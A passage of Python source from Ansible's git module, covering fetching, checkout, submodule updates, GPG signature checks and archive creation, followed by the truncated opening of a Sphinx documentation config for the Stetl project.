    if refspec:
        # fetch the extra refspec (e.g. to make an arbitrary SHA-1 reachable)
        cmd = [git_path, 'fetch']
        if depth:
            cmd.extend(['--depth', str(depth)])
        cmd.extend([remote, refspec])
        module.run_command(cmd, check_rc=True, cwd=dest)

    if verify_commit:
        verify_commit_sign(git_path, module, dest, version, gpg_whitelist)


def has_local_mods(module, git_path, dest, bare):
    """Report whether the working tree at *dest* has modifications to
    tracked files. Untracked files ('??' in porcelain output) are ignored.
    A bare repository never has local modifications."""
    if bare:
        return False

    rc, stdout, stderr = module.run_command(
        "%s status --porcelain" % (git_path), cwd=dest)
    tracked_changes = [ln for ln in stdout.splitlines()
                       if not re.search('^\\?\\?.*$', ln)]
    return len(tracked_changes) > 0


def reset(git_path, module, dest):
    '''
    Hard-reset the index and working tree to HEAD, discarding any
    changes to tracked files made since that commit.  Returns the
    (rc, stdout, stderr) tuple from the git command.
    '''
    return module.run_command(
        "%s reset --hard HEAD" % (git_path,), check_rc=True, cwd=dest)


def get_diff(module, git_path, dest, repo, remote, depth, bare, before, after):
    '''Return the difference between two revisions as a {'prepared': text}
    dict (empty dict when nothing changed).'''
    if before is None:
        return {'prepared': '>> Newly checked out %s' % after}
    if before == after:
        return {}

    # Ensure we have the object we are referring to during git diff !
    git_version_used = git_version(git_path, module)
    fetch(git_path, module, repo, dest, after, remote, depth, bare, '', git_version_used)

    (rc, out, err) = module.run_command(
        '%s diff %s %s' % (git_path, before, after), cwd=dest)
    if rc == 0 and out:
        return {'prepared': out}
    if rc == 0:
        return {'prepared': '>> No visual differences between %s and %s' % (before, after)}
    if err:
        return {'prepared': '>> Failed to get proper diff between %s and %s:\n>> %s' % (before, after, err)}
    return {'prepared': '>> Failed to get proper diff between %s and %s' % (before, after)}


def get_remote_head(git_path, module, dest, version, remote, bare):
    '''Return the SHA-1 that *version* resolves to on *remote*.

    Queries the remote with ``git ls-remote`` for HEAD, a branch or a tag;
    for an annotated tag the dereferenced ("^{}") object is preferred.
    A *version* that is neither of those is assumed to be a raw SHA-1 and
    returned unchanged, since a remote cannot be queried for an arbitrary
    hash.  Fails the module when the remote returns no revision.
    '''
    cloning = False
    cwd = None
    tag = False
    # when "remote" is really the repo URL we are still cloning and have
    # no local working directory to run git in (cwd stays None)
    if remote == module.params['repo']:
        cloning = True
    elif remote == 'file://' + os.path.expanduser(module.params['repo']):
        cloning = True
    else:
        cwd = dest
    if version == 'HEAD':
        if cloning:
            # cloning the repo, just get the remote's HEAD version
            cmd = '%s ls-remote %s -h HEAD' % (git_path, remote)
        else:
            head_branch = get_head_branch(git_path, module, dest, remote, bare)
            cmd = '%s ls-remote %s -h refs/heads/%s' % (git_path, remote, head_branch)
    elif is_remote_branch(git_path, module, dest, remote, version):
        cmd = '%s ls-remote %s -h refs/heads/%s' % (git_path, remote, version)
    elif is_remote_tag(git_path, module, dest, remote, version):
        tag = True
        # trailing * also matches the dereferenced "<tag>^{}" entry
        cmd = '%s ls-remote %s -t refs/tags/%s*' % (git_path, remote, version)
    else:
        # appears to be a sha1.  return as-is since it appears
        # cannot check for a specific sha1 on remote
        return version
    (rc, out, err) = module.run_command(cmd, check_rc=True, cwd=cwd)
    if len(out) < 1:
        module.fail_json(msg="Could not determine remote revision for %s" % version, stdout=out, stderr=err, rc=rc)

    out = to_native(out)

    if tag:
        # Find the dereferenced tag if this is an annotated tag.
        for tag in out.split('\n'):
            if tag.endswith(version + '^{}'):
                out = tag
                break
            elif tag.endswith(version):
                out = tag

    # ls-remote lines are "<sha>\t<ref>"; keep only the hash
    rev = out.split()[0]
    return rev


def is_remote_tag(git_path, module, dest, remote, version):
    """Return True when *version* exists as a tag on *remote*."""
    cmd = '%s ls-remote %s -t refs/tags/%s' % (git_path, remote, version)
    rc, out, err = module.run_command(cmd, check_rc=True, cwd=dest)
    return to_native(version, errors='surrogate_or_strict') in out


def get_branches(git_path, module, dest):
    """Return the stripped, non-empty lines of ``git branch --no-color -a``
    for the repo at *dest* (the current branch keeps its '* ' marker)."""
    cmd = '%s branch --no-color -a' % (git_path,)
    (rc, out, err) = module.run_command(cmd, cwd=dest)
    if rc != 0:
        module.fail_json(msg="Could not determine branch data - received %s" % out, stdout=out, stderr=err)
    return [line.strip() for line in out.split('\n') if line.strip()]


def get_annotated_tags(git_path, module, dest):
    """Return the names of annotated tags (objecttype 'tag') in *dest*."""
    cmd = [git_path, 'for-each-ref', 'refs/tags/', '--format', '%(objecttype):%(refname:short)']
    (rc, out, err) = module.run_command(cmd, cwd=dest)
    if rc != 0:
        module.fail_json(msg="Could not determine tag data - received %s" % out, stdout=out, stderr=err)
    tags = []
    for line in to_native(out).split('\n'):
        stripped = line.strip()
        if not stripped:
            continue
        tagtype, tagname = stripped.split(':')
        # lightweight tags show up as 'commit:<name>' and are skipped
        if tagtype == 'tag':
            tags.append(tagname)
    return tags


def is_remote_branch(git_path, module, dest, remote, version):
    """Return True when *version* exists as a branch head on *remote*."""
    cmd = '%s ls-remote %s -h refs/heads/%s' % (git_path, remote, version)
    rc, out, err = module.run_command(cmd, check_rc=True, cwd=dest)
    return to_native(version, errors='surrogate_or_strict') in out


def is_local_branch(git_path, module, dest, branch):
    """Return True when *branch* exists locally in *dest*, whether or not
    it is the currently checked-out ('* '-prefixed) branch."""
    branches = get_branches(git_path, module, dest)
    lbranch = '%s' % branch
    return lbranch in branches or ('* %s' % branch) in branches


def is_not_a_branch(git_path, module, dest):
    """Return True when HEAD in *dest* is detached (the current entry in
    ``git branch`` output carries a detached/no-branch marker)."""
    detached_markers = ('no branch', 'detached from', 'detached at')
    for branch in get_branches(git_path, module, dest):
        if branch.startswith('* ') and any(marker in branch for marker in detached_markers):
            return True
    return False


def get_repo_path(dest, bare):
    """Return the actual git directory for the checkout at *dest*.

    For a bare repo this is *dest* itself; otherwise it is ``dest/.git``.
    When ``.git`` is a *file* (submodule or separate-git-dir layout) the
    referenced directory is resolved and returned instead.

    Raises ValueError when the ``.git`` file is malformed or points at
    something that is not a directory.
    '''"""
    repo_path = dest if bare else os.path.join(dest, '.git')

    # A .git *file* means the real git dir lives elsewhere (e.g. we are
    # inside a submodule or a separate-git-dir checkout).
    if os.path.isfile(repo_path):
        with open(repo_path, 'r') as gitfile:
            data = gitfile.read()
        ref_prefix, gitdir = data.rstrip().split('gitdir: ', 1)
        if ref_prefix:
            raise ValueError('.git file has invalid git dir reference format')

        # There is a possibility the .git file to have an absolute path.
        if not os.path.isabs(gitdir):
            gitdir = os.path.join(repo_path.split('.git')[0], gitdir)
        repo_path = gitdir
        if not os.path.isdir(repo_path):
            raise ValueError('%s is not a directory' % repo_path)
    return repo_path


def get_head_branch(git_path, module, dest, remote, bare=False):
    '''
    Determine what branch HEAD is associated with.  This is partly
    taken from lib/ansible/utils/__init__.py.  It finds the correct
    path to .git/HEAD and reads from that file the branch that HEAD is
    associated with.  In the case of a detached HEAD, this will look
    up the branch in .git/refs/remotes/<remote>/HEAD.
    '''
    try:
        repo_path = get_repo_path(dest, bare)
    except (IOError, ValueError) as err:
        # the ``.git`` file did not resolve to a valid detached git dir
        module.fail_json(
            msg='Current repo does not have a valid reference to a '
            'separate Git dir or it refers to the invalid path',
            details=to_text(err),
        )
    # Read .git/HEAD for the branch name; in a detached-HEAD state fall
    # back to the remote's HEAD under .git/refs/remotes/<remote>/HEAD.
    headfile = os.path.join(repo_path, "HEAD")
    if is_not_a_branch(git_path, module, dest):
        headfile = os.path.join(repo_path, 'refs', 'remotes', remote, 'HEAD')
    return head_splitter(headfile, remote, module=module, fail_on_error=True)


def get_remote_url(git_path, module, dest, remote):
    '''Return URL of remote source for repo.'''
    rc, out, err = module.run_command(
        [git_path, 'ls-remote', '--get-url', remote], cwd=dest)
    if rc != 0:
        # There was an issue getting remote URL, most likely
        # command is not available in this version of Git.
        return None
    return to_native(out).rstrip('\n')


def set_remote_url(git_path, module, repo, dest, remote):
    '''Point *remote* at the URL *repo*, returning whether it changed.

    (The original docstring was copy-pasted from fetch() and described the
    wrong behavior.)  Returns False when the URL is already correct or when
    the current URL could not be determined; fails the module if
    ``git remote set-url`` itself fails.
    '''
    # Return if remote URL isn't changing.
    remote_url = get_remote_url(git_path, module, dest, remote)
    if remote_url == repo or unfrackgitpath(remote_url) == unfrackgitpath(repo):
        return False

    command = [git_path, 'remote', 'set-url', remote, repo]
    (rc, out, err) = module.run_command(command, cwd=dest)
    if rc != 0:
        label = "set a new url %s for %s" % (repo, remote)
        module.fail_json(msg="Failed to %s: %s %s" % (label, out, err))

    # Return False if remote_url is None to maintain previous behavior
    # for Git versions prior to 1.7.5 that lack required functionality.
    return remote_url is not None


def fetch(git_path, module, repo, dest, version, remote, depth, bare, refspec, git_version_used, force=False):
    ''' updates repo from remote sources

    Ensures the remote URL is current, then builds and runs one or two
    ``git fetch`` commands.  With *depth* set, it tries to fetch only the
    minimal refspecs needed to check out *version*; otherwise (or when
    *version* is not a branch/tag) it falls back to a full fetch.  Fails
    the module on any fetch error.
    '''
    set_remote_url(git_path, module, repo, dest, remote)
    commands = []

    fetch_str = 'download remote objects and refs'
    fetch_cmd = [git_path, 'fetch']

    refspecs = []
    if depth:
        # try to find the minimal set of refs we need to fetch to get a
        # successful checkout
        currenthead = get_head_branch(git_path, module, dest, remote)
        if refspec:
            refspecs.append(refspec)
        elif version == 'HEAD':
            refspecs.append(currenthead)
        elif is_remote_branch(git_path, module, dest, repo, version):
            if currenthead != version:
                # this workaround is only needed for older git versions
                # 1.8.3 is broken, 1.9.x works
                # ensure that remote branch is available as both local and remote ref
                refspecs.append('+refs/heads/%s:refs/heads/%s' % (version, version))
            refspecs.append('+refs/heads/%s:refs/remotes/%s/%s' % (version, remote, version))
        elif is_remote_tag(git_path, module, dest, repo, version):
            refspecs.append('+refs/tags/' + version + ':refs/tags/' + version)
        if refspecs:
            # if refspecs is empty, i.e. version is neither heads nor tags
            # assume it is a version hash
            # fall back to a full clone, otherwise we might not be able to checkout
            # version
            fetch_cmd.extend(['--depth', str(depth)])

    if not depth or not refspecs:
        # don't try to be minimalistic but do a full clone
        # also do this if depth is given, but version is something that can't be fetched directly
        if bare:
            refspecs = ['+refs/heads/*:refs/heads/*', '+refs/tags/*:refs/tags/*']
        else:
            # ensure all tags are fetched
            if git_version_used >= LooseVersion('1.9'):
                fetch_cmd.append('--tags')
            else:
                # old git versions have a bug in --tags that prevents updating existing tags
                commands.append((fetch_str, fetch_cmd + [remote]))
                refspecs = ['+refs/tags/*:refs/tags/*']
        if refspec:
            refspecs.append(refspec)

    if force:
        fetch_cmd.append('--force')

    fetch_cmd.extend([remote])

    commands.append((fetch_str, fetch_cmd + refspecs))

    # run the one or two fetches assembled above, failing on first error
    for (label, command) in commands:
        (rc, out, err) = module.run_command(command, cwd=dest)
        if rc != 0:
            module.fail_json(msg="Failed to %s: %s %s" % (label, out, err), cmd=command)


def submodules_fetch(git_path, module, remote, track_submodules, dest):
    """Fetch submodule changes and report whether any submodule differs.

    Returns True when a new submodule appeared or an existing submodule has
    updates (against the tracked remote branch when track_submodules is set,
    otherwise against the commit the superproject records).
    """
    changed = False

    if not os.path.exists(os.path.join(dest, '.gitmodules')):
        # no submodules
        return changed

    # Scan .gitmodules for submodule paths that were never checked out
    # (no .git entry below them) -- those count as new submodules.
    # Use a context manager so the file handle is always closed; the
    # original opened the file and leaked the handle.
    with open(os.path.join(dest, '.gitmodules'), 'r') as gitmodules_file:
        for line in gitmodules_file:
            # Check for new submodules
            if not changed and line.strip().startswith('path'):
                path = line.split('=', 1)[1].strip()
                # Check that dest/path/.git exists
                if not os.path.exists(os.path.join(dest, path, '.git')):
                    changed = True

    # Check for updates to existing modules
    if not changed:
        # Fetch updates
        begin = get_submodule_versions(git_path, module, dest)
        cmd = [git_path, 'submodule', 'foreach', git_path, 'fetch']
        (rc, out, err) = module.run_command(cmd, check_rc=True, cwd=dest)
        if rc != 0:
            # Defensive: check_rc=True already fails the module on rc != 0.
            module.fail_json(msg="Failed to fetch submodules: %s" % out + err)

        if track_submodules:
            # Compare against submodule HEAD
            # FIXME: determine this from .gitmodules
            version = 'master'
            after = get_submodule_versions(git_path, module, dest, '%s/%s' % (remote, version))
            if begin != after:
                changed = True
        else:
            # Compare against the superproject's expectation
            cmd = [git_path, 'submodule', 'status']
            (rc, out, err) = module.run_command(cmd, check_rc=True, cwd=dest)
            if rc != 0:
                module.fail_json(msg='Failed to retrieve submodule status: %s' % out + err)
            for line in out.splitlines():
                # A leading '+', '-' or 'U' (anything but a space) marks a
                # submodule that is out of sync with the superproject.
                if line[0] != ' ':
                    changed = True
                    break
    return changed


def submodule_update(git_path, module, dest, track_submodules, force=False):
    """Initialize and update any submodules under `dest`.

    Returns the (rc, stdout, stderr) of the final `git submodule update`
    call, or (0, '', '') when the repo has no .gitmodules file.
    """
    # Determine which flags this git's `submodule update` accepts.
    params = get_submodule_update_params(module, git_path, dest)

    # Nothing to do for repositories without submodules.
    if not os.path.exists(os.path.join(dest, '.gitmodules')):
        return (0, '', '')

    (rc, out, err) = module.run_command([git_path, 'submodule', 'sync'], check_rc=True, cwd=dest)

    update_cmd = [git_path, 'submodule', 'update', '--init', '--recursive']
    if 'remote' in params and track_submodules:
        # Track the remote branch instead of the recorded commit.
        update_cmd.append('--remote')
    if force:
        update_cmd.append('--force')

    (rc, out, err) = module.run_command(update_cmd, cwd=dest)
    if rc != 0:
        module.fail_json(msg="Failed to init/update submodules: %s" % out + err)
    return (rc, out, err)


def set_remote_branch(git_path, module, dest, remote, version, depth):
    """set refs for the remote branch version

    This assumes the branch does not yet exist locally and is therefore also not checked out.
    Can't use git remote set-branches, as it is not available in git 1.7.1 (centos6)
    """
    # Fetch the branch under both its local and its remote-tracking ref.
    refs = ' '.join([
        "+refs/heads/%s:refs/heads/%s" % (version, version),
        '+refs/heads/%s:refs/remotes/%s/%s' % (version, remote, version),
    ])
    fetch_cmd = "%s fetch --depth=%s %s %s" % (git_path, depth, remote, refs)
    (rc, out, err) = module.run_command(fetch_cmd, cwd=dest)
    if rc != 0:
        module.fail_json(msg="Failed to fetch branch from remote: %s" % version, stdout=out, stderr=err, rc=rc)


def switch_version(git_path, module, dest, remote, version, verify_commit, depth, gpg_whitelist):
    """Check out the requested version (branch, tag or SHA) in `dest`.

    Returns (rc, stdout, stderr) of the final checkout/reset command;
    fails the module on any git error.
    """
    cmd = ''
    if version == 'HEAD':
        # Follow the remote's HEAD branch, then hard-reset onto it below.
        branch = get_head_branch(git_path, module, dest, remote)
        (rc, out, err) = module.run_command("%s checkout --force %s" % (git_path, branch), cwd=dest)
        if rc != 0:
            module.fail_json(msg="Failed to checkout branch %s" % branch,
                             stdout=out, stderr=err, rc=rc)
        cmd = "%s reset --hard %s/%s --" % (git_path, remote, branch)
    else:
        # FIXME check for local_branch first, should have been fetched already
        if is_remote_branch(git_path, module, dest, remote, version):
            if depth and not is_local_branch(git_path, module, dest, version):
                # git clone --depth implies --single-branch, which makes
                # the checkout fail if the version changes
                # fetch the remote branch, to be able to check it out next
                set_remote_branch(git_path, module, dest, remote, version, depth)
            if not is_local_branch(git_path, module, dest, version):
                # Create a local tracking branch for the remote branch.
                cmd = "%s checkout --track -b %s %s/%s" % (git_path, version, remote, version)
            else:
                # Local branch exists: check it out, then hard-reset it to
                # the remote branch below.
                (rc, out, err) = module.run_command("%s checkout --force %s" % (git_path, version), cwd=dest)
                if rc != 0:
                    module.fail_json(msg="Failed to checkout branch %s" % version, stdout=out, stderr=err, rc=rc)
                cmd = "%s reset --hard %s/%s" % (git_path, remote, version)
        else:
            # Not a remote branch: assume tag or commit SHA and check it
            # out directly (detached HEAD).
            cmd = "%s checkout --force %s" % (git_path, version)
    (rc, out1, err1) = module.run_command(cmd, cwd=dest)
    if rc != 0:
        if version != 'HEAD':
            module.fail_json(msg="Failed to checkout %s" % (version),
                             stdout=out1, stderr=err1, rc=rc, cmd=cmd)
        else:
            # `branch` is only bound on the version == 'HEAD' path above.
            module.fail_json(msg="Failed to checkout branch %s" % (branch),
                             stdout=out1, stderr=err1, rc=rc, cmd=cmd)

    if verify_commit:
        # Optionally verify the GPG signature of the checked-out commit/tag.
        verify_commit_sign(git_path, module, dest, version, gpg_whitelist)

    return (rc, out1, err1)


def verify_commit_sign(git_path, module, dest, version, gpg_whitelist):
    """Verify the GPG signature on `version` (tag or commit).

    Fails the module when verification fails or, if a whitelist is given,
    when the signing key's fingerprint is not whitelisted.
    """
    # Annotated tags need `verify-tag`; everything else uses `verify-commit`.
    subcommand = "verify-tag" if version in get_annotated_tags(git_path, module, dest) else "verify-commit"
    verify_cmd = "%s %s %s" % (git_path, subcommand, version)
    if gpg_whitelist:
        # --raw emits machine-readable status lines for fingerprint parsing.
        verify_cmd += " --raw"
    (rc, out, err) = module.run_command(verify_cmd, cwd=dest)
    if rc != 0:
        module.fail_json(msg='Failed to verify GPG signature of commit/tag "%s"' % version, stdout=out, stderr=err, rc=rc)
    if gpg_whitelist:
        fingerprint = get_gpg_fingerprint(err)
        if fingerprint not in gpg_whitelist:
            module.fail_json(msg='The gpg_whitelist does not include the public key "%s" for this commit' % fingerprint, stdout=out, stderr=err, rc=rc)
    return (rc, out, err)


def get_gpg_fingerprint(output):
    """Return the fingerprint of the primary key from gpg --status output.

    Returns None when no VALIDSIG status line is present.

    Ref:
    https://git.gnupg.org/cgi-bin/gitweb.cgi?p=gnupg.git;a=blob;f=doc/DETAILS;hb=HEAD#l482
    """
    for line in output.splitlines():
        data = line.split()
        # Guard against short/empty lines: the original indexed data[1]
        # unconditionally and raised IndexError on any line with < 2 fields.
        if len(data) < 2 or data[1] != 'VALIDSIG':
            continue

        # If signed with a subkey, the full VALIDSIG line carries the
        # primary-key fingerprint as its last field; otherwise field 2 (the
        # signing key's own fingerprint) is the primary key.
        # NOTE: the original used data[11] for an 11-element list, which is
        # out of range (valid indices are 0..10) and always raised
        # IndexError; the last field is index 10.
        if len(data) == 11:
            return data[10]
        return data[2]


def git_version(git_path, module):
    """return the installed version of git"""
    (rc, out, err) = module.run_command("%s --version" % git_path)
    if rc != 0:
        # one could fail_json here, but the version info is not that important,
        # so let's try to fail only on actual git commands
        return None
    match = re.search('git version (.*)$', to_native(out))
    if match is None:
        return None
    return LooseVersion(match.group(1))


def git_archive(git_path, module, dest, archive, archive_fmt, archive_prefix, version):
    """ Create git archive in given source directory """
    archive_cmd = [git_path, 'archive', '--format', archive_fmt, '--output', archive]
    if archive_prefix is not None:
        # Prepend the prefix to every path inside the archive.
        archive_cmd.extend(['--prefix', archive_prefix])
    archive_cmd.append(version)
    (rc, out, err) = module.run_command(archive_cmd, cwd=dest)
    if rc != 0:
        module.fail_json(msg="Failed to perform archive operation",
                         details="Git archive command failed to create "
                                 "archive %s using %s directory."
                                 "Error: %s" % (archive, dest, err))
    return rc, out, err


def create_archive(git_path, module, dest, archive, archive_prefix, version, repo, result):
    """ Helper function for creating archive using git_archive """
    all_archive_fmt = {'.zip': 'zip', '.gz': 'tar.gz', '.tar': 'tar',
                       '.tgz': 'tgz'}
    archive_ext = os.path.splitext(archive)[1]
    archive_fmt = all_archive_fmt.get(archive_ext)
    if archive_fmt is None:
        module.fail_json(msg="Unable to get file extension from "
                             "archive file name : %s" % archive,
                         details="Please specify archive as filename with "
                                 "extension. File extension can be one "
                                 "of ['tar', 'tar.gz', 'zip', 'tgz']")

    repo_name = repo.split("/")[-1].replace(".git", "")

    if not os.path.exists(archive):
        # No previous archive: archive straight from the local directory.
        git_archive(git_path, module, dest, archive, archive_fmt, archive_prefix, version)
        result.update(changed=True)
        return

    # An archive already exists: build a fresh one in a temp dir, compare,
    # and only replace the old archive when the content differs.
    tempdir = tempfile.mkdtemp()
    new_archive = os.path.join(tempdir, repo_name) + '.' + archive_fmt
    git_archive(git_path, module, dest, new_archive, archive_fmt, archive_prefix, version)

    # Byte-wise comparison avoids hashing both files.
    if filecmp.cmp(new_archive, archive):
        result.update(changed=False)
        # Cleanup before exiting; best-effort.
        try:
            shutil.rmtree(tempdir)
        except OSError:
            pass
    else:
        try:
            shutil.move(new_archive, archive)
            shutil.rmtree(tempdir)
            result.update(changed=True)
        except OSError as e:
            module.fail_json(msg="Failed to move %s to %s" %
                                 (new_archive, archive),
                             details=u"Error occurred while moving : %s"
                                     % to_text(e))


# ===========================================

def main():
    """Ansible `git` module entry point.

    Parses the module parameters, then clones, fetches, updates and/or
    archives the requested repository, exiting via module.exit_json /
    module.fail_json.
    """
    module = AnsibleModule(
        argument_spec=dict(
            dest=dict(type='path'),
            repo=dict(required=True, aliases=['name']),
            version=dict(default='HEAD'),
            remote=dict(default='origin'),
            refspec=dict(default=None),
            reference=dict(default=None),
            force=dict(default='no', type='bool'),
            depth=dict(default=None, type='int'),
            clone=dict(default='yes', type='bool'),
            update=dict(default='yes', type='bool'),
            verify_commit=dict(default='no', type='bool'),
            gpg_whitelist=dict(default=[], type='list', elements='str'),
            accept_hostkey=dict(default='no', type='bool'),
            accept_newhostkey=dict(default='no', type='bool'),
            key_file=dict(default=None, type='path', required=False),
            ssh_opts=dict(default=None, required=False),
            executable=dict(default=None, type='path'),
            bare=dict(default='no', type='bool'),
            recursive=dict(default='yes', type='bool'),
            single_branch=dict(default=False, type='bool'),
            track_submodules=dict(default='no', type='bool'),
            umask=dict(default=None, type='raw'),
            archive=dict(type='path'),
            archive_prefix=dict(),
            separate_git_dir=dict(type='path'),
        ),
        mutually_exclusive=[('separate_git_dir', 'bare'), ('accept_hostkey', 'accept_newhostkey')],
        required_by={'archive_prefix': ['archive']},
        supports_check_mode=True
    )

    # Unpack module parameters into locals for readability.
    dest = module.params['dest']
    repo = module.params['repo']
    version = module.params['version']
    remote = module.params['remote']
    refspec = module.params['refspec']
    force = module.params['force']
    depth = module.params['depth']
    update = module.params['update']
    allow_clone = module.params['clone']
    bare = module.params['bare']
    verify_commit = module.params['verify_commit']
    gpg_whitelist = module.params['gpg_whitelist']
    reference = module.params['reference']
    single_branch = module.params['single_branch']
    git_path = module.params['executable'] or module.get_bin_path('git', True)
    key_file = module.params['key_file']
    ssh_opts = module.params['ssh_opts']
    umask = module.params['umask']
    archive = module.params['archive']
    archive_prefix = module.params['archive_prefix']
    separate_git_dir = module.params['separate_git_dir']

    result = dict(changed=False, warnings=list())

    # Inject StrictHostKeyChecking into ssh_opts unless the user already
    # set a host-key-checking policy themselves.
    if module.params['accept_hostkey']:
        if ssh_opts is not None:
            if ("-o StrictHostKeyChecking=no" not in ssh_opts) and ("-o StrictHostKeyChecking=accept-new" not in ssh_opts):
                ssh_opts += " -o StrictHostKeyChecking=no"
        else:
            ssh_opts = "-o StrictHostKeyChecking=no"

    if module.params['accept_newhostkey']:
        # accept-new requires OpenSSH >= 7.6; fall back with a warning.
        if not ssh_supports_acceptnewhostkey(module):
            module.warn("Your ssh client does not support accept_newhostkey option, therefore it cannot be used.")
        else:
            if ssh_opts is not None:
                if ("-o StrictHostKeyChecking=no" not in ssh_opts) and ("-o StrictHostKeyChecking=accept-new" not in ssh_opts):
                    ssh_opts += " -o StrictHostKeyChecking=accept-new"
            else:
                ssh_opts = "-o StrictHostKeyChecking=accept-new"

    # evaluate and set the umask before doing anything else
    if umask is not None:
        if not isinstance(umask, string_types):
            module.fail_json(msg="umask must be defined as a quoted octal integer")
        try:
            umask = int(umask, 8)
        except Exception:
            module.fail_json(msg="umask must be an octal integer",
                             details=str(sys.exc_info()[1]))
        os.umask(umask)

    # Certain features such as depth require a file:/// protocol for path based urls
    # so force a protocol here ...
    if os.path.expanduser(repo).startswith('/'):
        repo = 'file://' + os.path.expanduser(repo)

    # We screenscrape a huge amount of git commands so use C locale anytime we
    # call run_command()
    module.run_command_environ_update = dict(LANG='C', LC_ALL='C', LC_MESSAGES='C', LC_CTYPE='C')

    if separate_git_dir:
        separate_git_dir = os.path.realpath(separate_git_dir)

    # Resolve the path of the repo's config file; also relocate the git dir
    # when separate_git_dir points somewhere else than the current git dir.
    gitconfig = None
    if not dest and allow_clone:
        module.fail_json(msg="the destination directory must be specified unless clone=no")
    elif dest:
        dest = os.path.abspath(dest)
        try:
            repo_path = get_repo_path(dest, bare)
            if separate_git_dir and os.path.exists(repo_path) and separate_git_dir != repo_path:
                result['changed'] = True
                if not module.check_mode:
                    relocate_repo(module, result, separate_git_dir, repo_path, dest)
                    repo_path = separate_git_dir
        except (IOError, ValueError) as err:
            # No repo path found
            """``.git`` file does not have a valid format for detached Git dir."""
            module.fail_json(
                msg='Current repo does not have a valid reference to a '
                'separate Git dir or it refers to the invalid path',
                details=to_text(err),
            )
        gitconfig = os.path.join(repo_path, 'config')

    # create a wrapper script and export
    # GIT_SSH=<path> as an environment variable
    # for git to use the wrapper script
    ssh_wrapper = write_ssh_wrapper(module.tmpdir)
    set_git_ssh(ssh_wrapper, key_file, ssh_opts)
    module.add_cleanup_file(path=ssh_wrapper)

    git_version_used = git_version(git_path, module)

    if depth is not None and git_version_used < LooseVersion('1.9.1'):
        module.warn("git version is too old to fully support the depth argument. Falling back to full checkouts.")
        depth = None

    recursive = module.params['recursive']
    track_submodules = module.params['track_submodules']

    result.update(before=None)

    local_mods = False
    if (dest and not os.path.exists(gitconfig)) or (not dest and not allow_clone):
        # if there is no git configuration, do a clone operation unless:
        # * the user requested no clone (they just want info)
        # * we're doing a check mode test
        # In those cases we do an ls-remote
        if module.check_mode or not allow_clone:
            remote_head = get_remote_head(git_path, module, dest, version, repo, bare)
            result.update(changed=True, after=remote_head)
            if module._diff:
                diff = get_diff(module, git_path, dest, repo, remote, depth, bare, result['before'], result['after'])
                if diff:
                    result['diff'] = diff
            module.exit_json(**result)
        # there's no git config, so clone
        clone(git_path, module, repo, dest, remote, depth, version, bare, reference,
              refspec, git_version_used, verify_commit, separate_git_dir, result, gpg_whitelist, single_branch)
    elif not update:
        # Just return having found a repo already in the dest path
        # this does no checking that the repo is the actual repo
        # requested.
        result['before'] = get_version(module, git_path, dest)
        result.update(after=result['before'])
        if archive:
            # Git archive is not supported by all git servers, so
            # we will first clone and perform git archive from local directory
            if module.check_mode:
                result.update(changed=True)
                module.exit_json(**result)

            create_archive(git_path, module, dest, archive, archive_prefix, version, repo, result)

        module.exit_json(**result)
    else:
        # else do a pull
        local_mods = has_local_mods(module, git_path, dest, bare)
        result['before'] = get_version(module, git_path, dest)
        if local_mods:
            # failure should happen regardless of check mode
            if not force:
                module.fail_json(msg="Local modifications exist in repository (force=no).", **result)
            # if force and in non-check mode, do a reset
            if not module.check_mode:
                reset(git_path, module, dest)
                result.update(changed=True, msg='Local modifications exist.')

        # exit if already at desired sha version
        if module.check_mode:
            remote_url = get_remote_url(git_path, module, dest, remote)
            remote_url_changed = remote_url and remote_url != repo and unfrackgitpath(remote_url) != unfrackgitpath(repo)
        else:
            remote_url_changed = set_remote_url(git_path, module, repo, dest, remote)
        result.update(remote_url_changed=remote_url_changed)

        if module.check_mode:
            remote_head = get_remote_head(git_path, module, dest, version, remote, bare)
            result.update(changed=(result['before'] != remote_head or remote_url_changed), after=remote_head)
            # FIXME: This diff should fail since the new remote_head is not fetched yet?!
            if module._diff:
                diff = get_diff(module, git_path, dest, repo, remote, depth, bare, result['before'], result['after'])
                if diff:
                    result['diff'] = diff
            module.exit_json(**result)
        else:
            fetch(git_path, module, repo, dest, version, remote, depth, bare, refspec, git_version_used, force=force)

        result['after'] = get_version(module, git_path, dest)

    # switch to version specified regardless of whether
    # we got new revisions from the repository
    if not bare:
        switch_version(git_path, module, dest, remote, version, verify_commit, depth, gpg_whitelist)

    # Deal with submodules
    submodules_updated = False
    if recursive and not bare:
        submodules_updated = submodules_fetch(git_path, module, remote, track_submodules, dest)
        if submodules_updated:
            result.update(submodules_changed=submodules_updated)

            if module.check_mode:
                result.update(changed=True, after=remote_head)
                module.exit_json(**result)

            # Switch to version specified
            submodule_update(git_path, module, dest, track_submodules, force=force)

    # determine if we changed anything
    result['after'] = get_version(module, git_path, dest)

    # NOTE(review): remote_url_changed is only bound on the pull path above;
    # after a fresh clone this relies on `before != after` short-circuiting
    # the `or` before remote_url_changed is evaluated — confirm.
    if result['before'] != result['after'] or local_mods or submodules_updated or remote_url_changed:
        result.update(changed=True)
        if module._diff:
            diff = get_diff(module, git_path, dest, repo, remote, depth, bare, result['before'], result['after'])
            if diff:
                result['diff'] = diff

    if archive:
        # Git archive is not supported by all git servers, so
        # we will first clone and perform git archive from local directory
        if module.check_mode:
            result.update(changed=True)
            module.exit_json(**result)

        create_archive(git_path, module, dest, archive, archive_prefix, version, repo, result)

    module.exit_json(**result)


# Standard module boilerplate: run main() only when executed as a script.
if __name__ == '__main__':
    main()

# -*- coding: utf-8 -*-
#
# Stetl documentation build configuration file, created by
# sphinx-quickstart on Sun Jun  2 11:01:36 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

import sys, os

# indicate Sphinx is building (to replace @Config decorators)
os.environ['SPHINX_BUILD'] = '1'

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# Make the package one directory up importable for autodoc.
sys.path.insert(0, os.path.abspath('../'))
# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.viewcode']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
